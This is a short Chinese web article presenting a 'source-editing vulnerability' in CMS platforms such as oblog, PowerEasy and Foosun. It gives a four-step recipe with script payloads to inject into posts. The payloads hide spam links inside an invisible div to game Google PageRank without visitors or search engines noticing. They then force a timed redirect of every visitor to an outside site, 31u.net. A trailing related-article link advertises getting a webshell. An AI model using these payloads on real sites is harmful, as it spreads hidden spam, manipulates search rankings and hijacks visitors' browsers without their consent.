關(guān)于oblog、動易、風(fēng)訊等擁有源碼編輯的程序漏洞淺析
目前的oblog、動易、風(fēng)訊等一系列著名的系統(tǒng),都存在源碼編輯漏洞。
具體操作是:
1,進(jìn)入"源碼"編輯
2,輸入階段公分四段:
第一段:<此處輸入正文,做事需要手下留情嘛,來點實際內(nèi)容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此處輸入作弊鏈接,獲取google的pr值,此處的內(nèi)容將不會被瀏覽者看 到,且不會被搜索引擎發(fā)現(xiàn)>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不設(shè)置時間或?qū)r間設(shè)置為0,那么點擊該頁面后將直接跳轉(zhuǎn)到指定頁面。
相關(guān)文章
當(dāng)備份數(shù)據(jù)庫不能用時.用郵件列表得到WEBSHELL!(圖)
當(dāng)備份數(shù)據(jù)庫不能用時.用郵件列表得到WEBSHELL!(圖)...2007-01-01

